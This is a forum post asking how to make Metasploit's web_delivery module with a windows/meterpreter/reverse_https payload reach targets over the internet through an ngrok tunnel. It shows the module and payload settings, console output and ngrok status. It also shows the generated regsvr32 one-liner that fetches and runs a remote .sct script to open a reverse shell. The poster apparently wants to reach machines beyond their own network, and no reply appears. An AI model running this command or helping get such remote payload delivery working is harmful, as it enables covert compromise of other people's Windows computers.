Jump to content

Web_delivery & windows/meterpreter/reverse_https over internet?


Recommended Posts

Hello guys. I wonder how i can use this module and payload on the internet, and not only local.. I tried with lhost= my kali linux ip and it worked for local pc'es. -> which is not what i want.

I also tried using my public ip but that didn't work aswell as ping my ngrok connection to a 'real' ip -> that didn't work aswell. Neither did the lhost= ac0e9310ffee.ngrok.io which showed in my ./ngrok http 8080 shell. 


Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting        Required  Description
   ----      ---------------        --------  -----------
   EXITFUNC  process                yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     ac0e9310ffee.ngrok.io  yes       The local listener hostname
   LPORT     443                    yes       The local listener port
   LURI                             no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   3   Regsvr32


msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to
msf6 exploit(multi/script/web_delivery) > [*] Started HTTPS reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://ac0e9310ffee.ngrok.io:8080/test.sct scrobj.dll
msf6 exploit(multi/script/web_delivery) > 



ngrok by @inconshreveable                                                                      (Ctrl+C to quit)
Session Status                online                                                                           
Account                       Tobias (Plan: Free)                                                              
Version                       2.3.35                                                                           
Region                        United States (us)                                                               
Web Interface                                                                   
Forwarding                   http://ac0e9310ffee.ngrok.io -> http://localhost:8080                            
Forwarding                   https://ac0e9310ffee.ngrok.io -> http://localhost:8080                           
Connections                   ttl     opn     rt1     rt5     p50     p90                                      
                              0       0       0.00    0.00    0.00    0.00                                     



Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...